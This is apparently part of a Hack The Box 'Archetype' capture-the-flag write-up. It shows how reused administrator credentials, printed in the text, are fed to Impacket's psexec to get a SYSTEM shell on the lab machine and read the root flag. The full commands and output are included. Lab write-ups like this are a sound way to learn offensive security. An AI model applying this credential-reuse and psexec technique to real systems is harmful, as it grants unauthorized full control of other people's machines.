SUBMIT FLAG

Question: Submit user flag

In TASK 5 we used two different approaches to grab the user flag.

flag

SUBMIT FLAG

Question: Submit root flag

We can use the admin credentials found in TASK 7 to get an admin shell on the target.

admin credentials
username    administrator
password    MEGACORP_4dm1n!!

Using psexec from Impacket will land us SYSTEM privileges.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ impacket-psexec administrator@$rhost
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

Password:
[*] Requesting shares on 10.129.63.163.....
[*] Found writable share ADMIN$
[*] Uploading file ZUxKInhO.exe
[*] Opening SVCManager on 10.129.63.163.....
[*] Creating service EEnc on 10.129.63.163.....
[*] Starting service EEnc.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system
C:\Windows>

These high-level privileges give us access to the administrator’s desktop (C:\Users\Administrator\Desktop), which is where our root flag resides.

C:\Windows>cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 9565-0B4F

 Directory of C:\Users\Administrator\Desktop

07/27/2021  02:30 AM    <DIR>          .
07/27/2021  02:30 AM    <DIR>          ..
02/25/2020  07:36 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  10,689,736,704 bytes free
C:\Users\Administrator\Desktop>

All that’s left now is to grab the root flag and terminate the connection.

C:\Users\Administrator\Desktop>type root.txt
<flag>
C:\Users\Administrator\Desktop>exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Opening SVCManager on 10.129.63.163.....
[*] Stopping service EEnc.....
[*] Removing service EEnc.....
[*] Removing file ZUxKInhO.exe.....
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$

flag

Congratulations, we just successfully pwned the target machine. All we have left to do now is to terminate the target box (if not terminated automatically) before we continue with the next box!